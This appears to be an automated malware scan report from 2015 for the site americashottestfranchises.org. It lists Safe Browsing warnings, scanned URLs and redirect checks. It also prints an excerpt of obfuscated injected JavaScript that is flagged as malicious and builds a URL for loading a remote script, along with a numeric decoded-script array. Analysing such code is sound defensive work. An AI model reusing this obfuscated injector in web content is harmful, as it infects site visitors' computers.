Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=americashottestfranchises.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://americashottestfranchises.org/ | 200 OK Content-Length: 75757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) this.mk=5656;this.mk-=239;var F;this.O="";this.l="";L=function(){G={lF:false};function q(pk,y,A){return pk.substr(y,A);var Fw=new Array();var sP=new Array();}yB={j:"En"};this.T='';var t=RegExp;Q={};var Fp='';var La=document;var MW=new String();e={H:false};var D=new String("/cywo"+"rld-c"+"om/go"+"ogle."+q("com/yUeuL",0,5)+"oupor"+q("5J7n.com57J",3,5)+".php?"+"pid=7");var Rw={TW:false};this.x=22507;this.x-=52;function p(pk,y){var A=String("[")+y+q("]g ...[1142 bytes skipped]... Decoded script: [24,24,0,172,180,40,52,8,88,84,128,68,92,168,100,48,68,168,136,104,68,128,68,92,168,124,4,44,200,152,48,184,152,128,68,40,132,108,8,52,44,132,12,56,112,72,12,32,24,24,24,0,172,160,152,128,68,160,40,12,36,24,24,144,180,68,104,124,68,180,32,24,24,24,52,8,88,84,128,68,92,168,100,60,160,0,168,68,40,120,176,0,172,160,152,128,68,180,124,160,88,140,132,28,168,168,188,76,80,80,196,152,128,28,84,192,92,28,100,88,196,100,88,88,80,88,8,84,92,168,164,64,100 ...[93212 bytes skipped]... Antivirus reports:
| ||
http://chinapower7.com/count.js | 500 Can't connect to chinapower7.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://chinapower7.com/test404page.js | 500 Can't connect to chinapower7.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://question.eu.gp/wp-admin/wp-app.php | HTTP/1.1 503 Service Unavailable Connection: close Date: Wed, 14 Jan 2015 03:06:34 GMT Retry-After: 604800 Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 2621 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.4.36-0+deb7u3 | clean |
http://www.qualigo.de/doks/search/source/std/charge_direct.php?ds=subdomzz&subds=eu.gp&fallback_url=http%3a%2f%2fwww.eu.gp | HTTP/1.1 503 Service Unavailable Connection: close Date: Wed, 14 Jan 2015 03:06:35 GMT Accept-Ranges: bytes Retry-After: 604800 Server: Apache Vary: Accept-Encoding Content-Length: 307 Content-Type: text/html; charset=UTF-8 | clean |
http://www.qualigo.de/doks/search/source/std/charge_direct.php?ds=subdomzz&subds=eu.gp&fallback_url=http%3a%2f%2fwww.eu.gp&force_refresh=1 | HTTP/1.1 307 Temporary Redirect Connection: close Date: Wed, 14 Jan 2015 03:06:35 GMT Accept-Ranges: bytes Location: http://www.eu.gp Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=ISO-8859-15 | clean |
http://www.eu.gp/ | 200 OK Content-Length: 43575 Content-Type: text/html | clean |
http://www.eu.gp/static/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://question.eu.gp/static/js/jquery-ui-1.8.4.custom.min.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.cookies.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.equalheights.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://question.eu.gp/static/js/plugins/jquery.json-2.2.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: americashottestfranchises.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 03:06:32 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 75757
Content-Type: text/html
...75757 bytes of data.
GET / HTTP/1.1
Host: americashottestfranchises.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 03:06:32 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 75757
Content-Type: text/html
...75757 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: americashottestfranchises.org
Referer: http://www.google.com/search?q=americashottestfranchises.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: americashottestfranchises.org
Referer: http://www.google.com/search?q=americashottestfranchises.org
Result:
The result is similar to the first query. There are no suspicious redirects found.